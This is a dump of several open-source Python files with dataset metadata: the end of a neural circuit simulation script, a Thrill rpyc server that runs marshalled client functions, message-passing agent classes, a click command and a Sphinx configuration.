upto=p.nonplasticwarmup_simtime)
tuning_afterwarmup = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
tuning_duringreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
tuning_afterreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
tuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimtuning_initial = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimtuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimPVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimPVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
PVtuning_afterwarmup = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
PVtuning_duringreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
PVtuning_afterreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
PVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
VIPtuning_initial = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
VIPtuning_afterwarmup = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
VIPtuning_duringreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
VIPtuning_afterreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
VIPtuning_final = get_tuning_avgoverperiod(VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
SOMtuning_initial = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
SOMtuning_afterwarmup = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
SOMtuning_duringreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
SOMtuning_afterreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
SOMtuning_final = get_tuning_avgoverperiod(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PYRData_reward = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PYRData = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
SSTData_reward = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
SSTData = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PVData_reward = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PVData = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PYRData_afterreward = get_spiketrains_foreachstim(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
SSTData_afterreward = get_spiketrains_foreachstim(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
PVData_afterreward = get_spiketrains_foreachstim(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
try:
currentratio_initial, currentratiomean_initial, ampE_initial, ampI_initial, amp2Ei, amp2Ii, amp3Ei, amp3Ii = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
currentratio_final, currentratiomean_final, ampE_final, ampI_final, amp2Ef, amp2If, amp3Ef, amp3If = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime - p.after_simtime,
upto=total_simtime)
except:
currentratio_initial = []
currentratiomean_initial = []
ampE_initial = []
ampI_initial = []
amp2Ei = []
amp2Ii = []
amp3Ei = []
amp3Ii = []
currentratio_final = []
currentratiomean_final = []
ampE_final = []
ampI_final = []
amp2Ef = []
amp2If = []
amp3Ef = []
amp3If = []
results = {
'impact': impact,
'impact_aftereward': impactmax_afterreward,
'impactmax': impact,
'impactmax_aftereward': impactmax_afterreward,
'SOM0PV': SOM0PV.w,
'SOMotherPV': SOMotherPV.w,
'weights_rec': con_REC.w[:],
'weights_rec_afterwarmup': conREC_afterwarmup,
'weights_rec_afterreward': conREC_afterreward,
'weights_rec_start': conREC_start,
'weights_rec_i': con_REC.i[:],
'weights_rec_j': con_REC.j[:],
'weights_sst_pv': con_SOM_PV.w[:],
'weights_sst_pv_afterwarmup': sstpv_w_afterwarmup,
'weights_sst_pv_afterreward': sstpv_w_afterreward,
'stimtuning_initial': stimtuning_initial,
'stimtuning_final': stimtuning_final,
'stimPVtuning_initial': stimPVtuning_initial,
'stimPVtuning_final': stimPVtuning_final,
't': PYR1.t[:],
'tuning_initial': tuning_initial,
'tuning_final': tuning_final,
'tuning_afterwarmup': tuning_afterwarmup,
'tuning_rewardend': tuning_duringreward,
'tuning_after_rewardend': tuning_afterreward,
'PVtuning_initial': PVtuning_initial,
'PVtuning_final': PVtuning_final,
'PVtuning_afterwarmup': PVtuning_afterwarmup,
'PVtuning_rewardend': PVtuning_duringreward,
'PVtuning_after_rewardend': PVtuning_afterreward,
'VIPtuning_initial': VIPtuning_initial,
'VIPtuning_final': VIPtuning_final,
'VIPtuning_afterwarmup': VIPtuning_afterwarmup,
'VIPtuning_rewardend': VIPtuning_duringreward,
'VIPtuning_after_rewardend': VIPtuning_afterreward,
'SOMtuning_initial': SOMtuning_initial,
'SOMtuning_final': SOMtuning_final,
'SOMtuning_rewardend': SOMtuning_duringreward,
'SOMtuning_after_rewardend': SOMtuning_afterreward,
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'PYRPV_w': monPYRPV.w[:],
'PYRVIP_w': monPYRVIP.w[:],
'PVPYR_w': monPVPYR.w[:],
'PVPV_w': monPVPV.w[:],
'PVSOM_w': monPVSOM.w[:],
'PVVIP_w': monPVVIP.w[:],
'VIPSOM_w': monVIPSOM.w[:],
'VIPPYR_w': monVIPPYR.w[:],
'VIPPV_w': monVIPPV.w[:],
'VIPVIP_w': monVIPVIP.w[:],
'SOMVIP_w': monSOMVIP.w[:],
'SOMPYR_w': monSOMPYR.w[:],
'SOMSOM_w': monSOMSOM.w[:],
'PYRSOM1_w': monPYRSOM1.w[:],
'PYRSOM2_w': monPYRSOM2.w[:],
'PYRSOM3_w': monPYRSOM3.w[:],
'PYRSOM4_w': monPYRSOM4.w[:],
'currentratio_initial': currentratio_initial,
'currentratio_final': currentratio_final,
'PYR0toothers': mona.w,
'otherstoPYR0': monb.w,
'PYR1toothers': monc.w,
'PYR2toothers': mond.w,
'PYR3toothers': mone.w,
'PYRi': PYRi[:],
'PYRt': PYRt[:],
'SSTi': SSTi[:],
'SSTt': SSTt[:],
'PVi': PVi[:],
'PVt': PVt[:],
'VIPi': VIPi[:],
'VIPt': VIPt[:],
'PYRData0_reward': PYRData_reward['0'],
'PYRData1_reward': PYRData_reward['1'],
'PVData_reward': PVData_reward['0'],
'PVData1_reward': PVData_reward['1'],
'SSTData_reward': SSTData_reward['0'],
'SSTData1_reward': SSTData_reward['1'],
'PYRData0': PYRData_afterreward['0'],
'PYRData1': PYRData_afterreward['1'],
'PVData0': PVData_afterreward['0'],
'PVData1': PVData_afterreward['1'],
'SSTData0': SSTData_afterreward['0'],
'SSTData1': SSTData_afterreward['1'],
'PYRDataAll0': PYRData['0'],
'PYRDataAll1': PYRData['1'],
'PYRDataAll2': PYRData['2'],
'PYRDataAll3': PYRData['3'],
'SSTDataAll0': SSTData['0'],
'SSTDataAll1': SSTData['1'],
'SSTDataAll2': SSTData['2'],
'SSTDataAll3': SSTData['3'],
'PVDataAll0': PVData['0'],
'PVDataAll1': PVData['1'],
'PVDataAll2': PVData['2'],
'PVDataAll3': PVData['3'],
'Pyr1rate': PYR1.smooth_rate(window='flat', width=0.5 * ms),
'Pyr2rate': PYR2.smooth_rate(window='flat', width=0.5 * ms),
'Pyr3rate': PYR3.smooth_rate(window='flat', width=0.5 * ms),
'Pyr4rate': PYR4.smooth_rate(window='flat', width=0.5 * ms),
'SOM1rate': SOM1.smooth_rate(window='flat', width=0.5 * ms),
'SOM2rate': SOM2.smooth_rate(window='flat', width=0.5 * ms),
'SOM3rate': SOM3.smooth_rate(window='flat', width=0.5 * ms),
'SOM4rate': SOM4.smooth_rate(window='flat', width=0.5 * ms),
'PVrate': PVmon.smooth_rate(window='flat', width=0.5 * ms),
}
results_file = f'./results/results_tuned{TUNED_ORI}_2.pkl'
print("Saving results to:", results_file)
with open(results_file, 'wb') as f:
pickle.dump(results, f) | true | true |
1c304fd07c92b9666cc4f024f111acb314da5bd6 | 2,529 | py | Python | frontends/swig_python/python_rpyc_server.py | stevenybw/thrill | a2dc05035f4e24f64af0a22b60155e80843a5ba9 | [
"BSD-2-Clause"
] | 609 | 2015-08-27T11:09:24.000Z | 2022-03-28T21:34:05.000Z | frontends/swig_python/python_rpyc_server.py | tim3z/thrill | f0e5aa2326a55af3c9a92fc418f8eb8e3cf8c5fa | [
"BSD-2-Clause"
] | 109 | 2015-09-10T21:34:42.000Z | 2022-02-15T14:46:26.000Z | frontends/swig_python/python_rpyc_server.py | tim3z/thrill | f0e5aa2326a55af3c9a92fc418f8eb8e3cf8c5fa | [
"BSD-2-Clause"
] | 114 | 2015-08-27T14:54:13.000Z | 2021-12-08T07:28:35.000Z | #!/usr/bin/env python
##########################################################################
# frontends/swig_python/python_rpyc_server.py
#
# Part of Project Thrill - http://project-thrill.org
#
# Copyright (C) 2015 Timo Bingmann <tb@panthema.net>
#
# All rights reserved. Published under the BSD-2 license in the LICENSE file.
##########################################################################
import sys
import marshal
import types
import rpyc
import thrill
class RpcDIA():
    """RPC-facing wrapper around a Thrill DIA.

    Function objects cannot travel over the rpyc connection, so clients
    send user callables as marshalled code-object bytes.  Each operation
    rebuilds a real function from those bytes before delegating to the
    wrapped DIA, and re-wraps any DIA result so chained calls keep
    working across the RPC boundary.
    """

    def __init__(self, dia):
        # The underlying thrill DIA all operations delegate to.
        self._dia = dia

    @staticmethod
    def _unmarshal_function(code_bytes):
        """Rebuild a callable from marshalled code-object bytes."""
        return types.FunctionType(marshal.loads(code_bytes), globals())

    def AllGather(self):
        """Return all elements of the DIA as a list."""
        return self._dia.AllGather()

    def Size(self):
        """Return the number of elements in the DIA."""
        return self._dia.Size()

    def Map(self, map_function):
        """Apply a marshalled map function element-wise.

        :param map_function: marshalled code object of a one-argument
            function.
        :return: the resulting DIA, wrapped in a new RpcDIA.
        """
        return RpcDIA(self._dia.Map(self._unmarshal_function(map_function)))

    def ReduceBy(self, key_extractor, reduce_function):
        """Group by key and reduce each group.

        :param key_extractor: marshalled code object mapping an element
            to its key.
        :param reduce_function: marshalled code object combining two
            elements of the same key group.
        :return: the resulting DIA, wrapped in a new RpcDIA.
        """
        return RpcDIA(self._dia.ReduceBy(
            self._unmarshal_function(key_extractor),
            self._unmarshal_function(reduce_function)))
class RpcContext():
    """Server-side handle exposing a thrill PyContext over RPC."""

    def __init__(self, host_ctx, my_host_rank):
        # One PyContext per connection; the rank selects the local worker.
        self._ctx = thrill.PyContext(host_ctx, my_host_rank)

    def Generate(self, generator_function, size):
        """Build a DIA of ``size`` items from a marshalled generator.

        ``generator_function`` arrives as marshalled code-object bytes
        and is rebuilt into a real function before use.
        """
        generator = types.FunctionType(
            marshal.loads(generator_function), globals())
        return RpcDIA(self._ctx.Generate(generator, size))

    def Distribute(self, array):
        """Build a DIA from an already materialized sequence."""
        return RpcDIA(self._ctx.Distribute(array))
class MyService(rpyc.Service):
def on_connect(self):
# code that runs when a connection is created
# (to init the serivce, if needed)
print("hello client")
pass
def on_disconnect(self):
# code that runs when the connection has already closed
# (to finalize the service, if needed)
print("client disconnected")
pass
def exposed_Create(self, my_host_rank, endpoints):
print("Creating thrill context for rank",
my_host_rank, "endpoints", endpoints)
host_ctx = thrill.HostContext(my_host_rank, endpoints, 1)
return RpcContext(host_ctx, 0)
if __name__ == "__main__":
from rpyc.utils.server import ThreadedServer
t = ThreadedServer(MyService, port=int(sys.argv[1]),
protocol_config={"allow_public_attrs": True})
t.start()
##########################################################################
| 30.107143 | 77 | 0.608936 | true | true | |
1c30502cf2a178c2357083e71e9e94f53d3bb7bf | 7,654 | py | Python | infdist/optimization/agent.py | zeroos/infdist | 5fca2c42bbe5ea650866a26568d1eaf240b2b47e | [
"MIT"
] | null | null | null | infdist/optimization/agent.py | zeroos/infdist | 5fca2c42bbe5ea650866a26568d1eaf240b2b47e | [
"MIT"
] | null | null | null | infdist/optimization/agent.py | zeroos/infdist | 5fca2c42bbe5ea650866a26568d1eaf240b2b47e | [
"MIT"
] | null | null | null | from copy import copy, deepcopy
from itertools import islice
import random
from .dynamic_message_tree import DynamicMessageTree
from .dynamic_models import DynamicMessageSet
from .models import MessageSet
from .message_forecast import MessageForecast
class BaseAgent:
ACT_DROP = 0
ACT_SEND = 1
ACT_NO_DECISION = -1
def __init__(self, ident, net, messages_context, now_func):
self.ident = ident
self.received_messages = MessageSet(0)
self.sent_messages = MessageSet(0)
self.generated_messages = MessageSet(0)
self.net = net
self.messages_context = messages_context
self.now_func = now_func
def gen_message_received_callback(self):
def message_received(message):
self.received(message)
return message_received
def send(self, native_message, message):
assert message.sender == self.ident
self.net.send(native_message)
message.t_sent = self.now_func()
self.register_sent(message)
def generated(self, native_message):
message = self.net.deserialize(native_message)
self.register_generated(message)
result = self.process_message(message)
if result == self.ACT_SEND:
self.send(native_message, message)
elif result != self.ACT_DROP:
raise Exception(f"Unknown action {result}")
def process_message(self, m):
raise NotImplementedError()
def received(self, native_message):
message = self.net.deserialize(native_message)
self.register_received(message)
def register_generated(self, message):
self.generated_messages.append(message)
def register_sent(self, message):
self.sent_messages.append(message)
def register_received(self, message):
self.received_messages.append(message)
def gen_generate_message_callback(self, m):
def _generate_message():
self.generated(m)
return _generate_message
def finish_mission(self, t):
self.received_messages.t_end = t
class FullCommAgent(BaseAgent):
"""
This agent sends all messages.
"""
def process_message(self, m):
return self.ACT_SEND
class FixedRatioAgent(BaseAgent):
"""
Agent that randomly drops messages with a predefined probability.
"""
def __init__(self, *args, **kwargs):
self.drop_ratio = kwargs.pop('drop_ratio', 0.5)
super().__init__(*args, **kwargs)
def process_message(self, m):
if random.random() > self.drop_ratio:
return self.ACT_SEND
return self.ACT_DROP
class ConstrainedAgent(BaseAgent):
"""
A base class for all agents implementing constraints.
"""
def __init__(self, *args, **kwargs):
self.constraints = kwargs.pop('constraints')
super().__init__(*args, **kwargs)
def process_message(self, message):
for constraint in self.constraints.values():
constraint.update_model(
self.received_messages + self.sent_messages, self.now_func()
)
return self.ACT_NO_DECISION
class GreedyConstrainedAgent(ConstrainedAgent):
"""
A greedy agent that tries to maintain constraint.
Keep in mind that no predictions are being made about what other agents
are sending, so it is very likely that the constraint is not maintained.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def process_message(self, message):
super().process_message(message)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
all_messages = self.received_messages + self.sent_messages
all_messages.append(est_sent_message)
messages = DynamicMessageSet()
messages = messages.add_messageset(all_messages)
for constraint in self.constraints.values():
if constraint(
messages, True
):
return self.ACT_DROP
return self.ACT_SEND
class BaseTreeAgent(ConstrainedAgent):
"""
Base class for agents implementing a decision tree.
"""
DEFAULT_T_END = 10
def __init__(self, *args, **kwargs):
self.agents = kwargs.pop('agents')
self.simulations_num = kwargs.pop('simulations_num', 1500)
limit_history = kwargs.pop('limit_history', 0)
suppress_warnings = kwargs.pop('suppress_warnings', False)
super().__init__(*args, **kwargs)
self.tree = DynamicMessageTree(
self.DEFAULT_T_END,
self.messages_context,
self.constraints,
)
self.tree.limit_history = limit_history
self.tree.suppress_warnings = suppress_warnings
self.active = True
def process_message(self, message):
super().process_message(message)
if not self.active:
return self.ACT_DROP
self.tree.progress_time(message.t_gen)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
if self.tree.decide(est_sent_message, self.simulations_num):
return self.ACT_SEND
# print("DROPPING")
return self.ACT_DROP
def register_sent(self, message):
super().register_sent(message)
message_copy = copy(message)
self.tree.register_message(message_copy)
def register_received(self, message):
super().register_received(message)
message_copy = copy(message)
message_copy.receivers = (
set(self.agents.keys()) - set([message_copy.sender])
)
self.tree.register_message(message_copy)
latency = self.now_func() - message.t_gen
self.tree.latency = latency
class FullKnowledgeAgent(BaseTreeAgent):
"""
A decision tree-based agent knowing all messages that are going to be
exchanged in the system.
"""
def __init__(self, *args, **kwargs):
all_messages = kwargs.pop('all_messages')
super().__init__(*args, **kwargs)
self.all_messages = all_messages
def process_message(self, message):
self.tree.update_future(deepcopy(self.all_messages))
return super().process_message(message)
class EstimatingAgent(BaseTreeAgent):
"""
A decision tree-based agent that estimates the messages to be exchanged
by other agents.
The estimation is made by MessageForecast class based on the mission
context.
"""
def __init__(self, *args, **kwargs):
self.window_size = kwargs.pop('window_size')
self.future_messages_num = kwargs.pop('future_messages_num', 30)
super().__init__(*args, **kwargs)
self.forecast = MessageForecast(self.messages_context)
def register_sent(self, message):
super().register_sent(message)
self.forecast.register(message)
def register_received(self, message):
super().register_received(message)
if message.t_rcv is None:
message.t_rcv = self.now_func()
self.forecast.register(message)
def process_message(self, message):
future_generator = self.forecast.message_generator(
message.t_gen-min(
self.tree.pessymistic_latency,
self.window_size
),
[message],
)
self.tree.update_future(
MessageSet(
t_end=self.forecast.estimate_t_end(),
messages=list(
islice(future_generator, self.future_messages_num)
)
)
)
return super().process_message(message)
| 31.240816 | 76 | 0.651555 | from copy import copy, deepcopy
from itertools import islice
import random
from .dynamic_message_tree import DynamicMessageTree
from .dynamic_models import DynamicMessageSet
from .models import MessageSet
from .message_forecast import MessageForecast
class BaseAgent:
ACT_DROP = 0
ACT_SEND = 1
ACT_NO_DECISION = -1
def __init__(self, ident, net, messages_context, now_func):
self.ident = ident
self.received_messages = MessageSet(0)
self.sent_messages = MessageSet(0)
self.generated_messages = MessageSet(0)
self.net = net
self.messages_context = messages_context
self.now_func = now_func
def gen_message_received_callback(self):
def message_received(message):
self.received(message)
return message_received
def send(self, native_message, message):
assert message.sender == self.ident
self.net.send(native_message)
message.t_sent = self.now_func()
self.register_sent(message)
def generated(self, native_message):
message = self.net.deserialize(native_message)
self.register_generated(message)
result = self.process_message(message)
if result == self.ACT_SEND:
self.send(native_message, message)
elif result != self.ACT_DROP:
raise Exception(f"Unknown action {result}")
def process_message(self, m):
raise NotImplementedError()
def received(self, native_message):
message = self.net.deserialize(native_message)
self.register_received(message)
def register_generated(self, message):
self.generated_messages.append(message)
def register_sent(self, message):
self.sent_messages.append(message)
def register_received(self, message):
self.received_messages.append(message)
def gen_generate_message_callback(self, m):
def _generate_message():
self.generated(m)
return _generate_message
def finish_mission(self, t):
self.received_messages.t_end = t
class FullCommAgent(BaseAgent):
def process_message(self, m):
return self.ACT_SEND
class FixedRatioAgent(BaseAgent):
def __init__(self, *args, **kwargs):
self.drop_ratio = kwargs.pop('drop_ratio', 0.5)
super().__init__(*args, **kwargs)
def process_message(self, m):
if random.random() > self.drop_ratio:
return self.ACT_SEND
return self.ACT_DROP
class ConstrainedAgent(BaseAgent):
def __init__(self, *args, **kwargs):
self.constraints = kwargs.pop('constraints')
super().__init__(*args, **kwargs)
def process_message(self, message):
for constraint in self.constraints.values():
constraint.update_model(
self.received_messages + self.sent_messages, self.now_func()
)
return self.ACT_NO_DECISION
class GreedyConstrainedAgent(ConstrainedAgent):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def process_message(self, message):
super().process_message(message)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
all_messages = self.received_messages + self.sent_messages
all_messages.append(est_sent_message)
messages = DynamicMessageSet()
messages = messages.add_messageset(all_messages)
for constraint in self.constraints.values():
if constraint(
messages, True
):
return self.ACT_DROP
return self.ACT_SEND
class BaseTreeAgent(ConstrainedAgent):
DEFAULT_T_END = 10
def __init__(self, *args, **kwargs):
self.agents = kwargs.pop('agents')
self.simulations_num = kwargs.pop('simulations_num', 1500)
limit_history = kwargs.pop('limit_history', 0)
suppress_warnings = kwargs.pop('suppress_warnings', False)
super().__init__(*args, **kwargs)
self.tree = DynamicMessageTree(
self.DEFAULT_T_END,
self.messages_context,
self.constraints,
)
self.tree.limit_history = limit_history
self.tree.suppress_warnings = suppress_warnings
self.active = True
def process_message(self, message):
super().process_message(message)
if not self.active:
return self.ACT_DROP
self.tree.progress_time(message.t_gen)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
if self.tree.decide(est_sent_message, self.simulations_num):
return self.ACT_SEND
return self.ACT_DROP
def register_sent(self, message):
super().register_sent(message)
message_copy = copy(message)
self.tree.register_message(message_copy)
def register_received(self, message):
super().register_received(message)
message_copy = copy(message)
message_copy.receivers = (
set(self.agents.keys()) - set([message_copy.sender])
)
self.tree.register_message(message_copy)
latency = self.now_func() - message.t_gen
self.tree.latency = latency
class FullKnowledgeAgent(BaseTreeAgent):
def __init__(self, *args, **kwargs):
all_messages = kwargs.pop('all_messages')
super().__init__(*args, **kwargs)
self.all_messages = all_messages
def process_message(self, message):
self.tree.update_future(deepcopy(self.all_messages))
return super().process_message(message)
class EstimatingAgent(BaseTreeAgent):
def __init__(self, *args, **kwargs):
self.window_size = kwargs.pop('window_size')
self.future_messages_num = kwargs.pop('future_messages_num', 30)
super().__init__(*args, **kwargs)
self.forecast = MessageForecast(self.messages_context)
def register_sent(self, message):
super().register_sent(message)
self.forecast.register(message)
def register_received(self, message):
super().register_received(message)
if message.t_rcv is None:
message.t_rcv = self.now_func()
self.forecast.register(message)
def process_message(self, message):
future_generator = self.forecast.message_generator(
message.t_gen-min(
self.tree.pessymistic_latency,
self.window_size
),
[message],
)
self.tree.update_future(
MessageSet(
t_end=self.forecast.estimate_t_end(),
messages=list(
islice(future_generator, self.future_messages_num)
)
)
)
return super().process_message(message)
| true | true |
1c30507f3356bafbdd5cc8cce338dc9c571a00a8 | 461 | py | Python | soane/comms/list.py | spheten/soane | b5517275b8b3fd3b2b5a19b031c98cfd45d42292 | [
"BSD-3-Clause"
] | 1 | 2021-10-03T07:13:55.000Z | 2021-10-03T07:13:55.000Z | soane/comms/list.py | spheten/soane | b5517275b8b3fd3b2b5a19b031c98cfd45d42292 | [
"BSD-3-Clause"
] | 14 | 2021-10-03T07:10:10.000Z | 2021-10-06T09:07:41.000Z | soane/comms/list.py | spheten/soane | b5517275b8b3fd3b2b5a19b031c98cfd45d42292 | [
"BSD-3-Clause"
] | null | null | null | '''
Command definition for 'list'.
'''
import click
from soane.comms._base import group
@group.command(
name = 'list',
short_help = 'List notes.',
add_help_option = False,
)
@click.argument('glob',
default = '*',
required = False,
)
@click.help_option('-h', '--help')
@click.pass_obj
def list_(book, glob):
'''
List all notes or notes matching GLOB.
'''
for note in book.match(glob):
click.echo(note.name)
| 17.074074 | 42 | 0.609544 |
import click
from soane.comms._base import group
@group.command(
name = 'list',
short_help = 'List notes.',
add_help_option = False,
)
@click.argument('glob',
default = '*',
required = False,
)
@click.help_option('-h', '--help')
@click.pass_obj
def list_(book, glob):
for note in book.match(glob):
click.echo(note.name)
| true | true |
1c30508127e48ea49a1c38482226cef7e7506fd2 | 2,257 | py | Python | docs/conf.py | atviriduomenys/spinta | 77a10e201f8cdc63143fce7996fd0898acb1ff58 | [
"MIT"
] | 2 | 2019-03-14T06:41:14.000Z | 2019-03-26T11:48:14.000Z | docs/conf.py | sirex/spinta | 77a10e201f8cdc63143fce7996fd0898acb1ff58 | [
"MIT"
] | 44 | 2019-04-05T15:52:45.000Z | 2022-03-30T07:41:33.000Z | docs/conf.py | sirex/spinta | 77a10e201f8cdc63143fce7996fd0898acb1ff58 | [
"MIT"
] | 1 | 2019-04-01T09:54:27.000Z | 2019-04-01T09:54:27.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Spinta'
copyright = '2020-2021, Spinta Team'
author = 'Spinta Team'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.venv']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
master_doc = 'index'
autodoc_typehints = 'description'
| 33.686567 | 79 | 0.675233 |
